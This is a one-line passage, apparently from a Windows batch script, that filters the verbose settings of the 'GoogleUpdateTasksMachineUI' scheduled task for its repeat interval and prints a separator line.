"GoogleUpdateTasksMachineUI" /V | findstr /b /n /c:"Repeat: Every:" 2>&1 & echo ______________________________________________________________________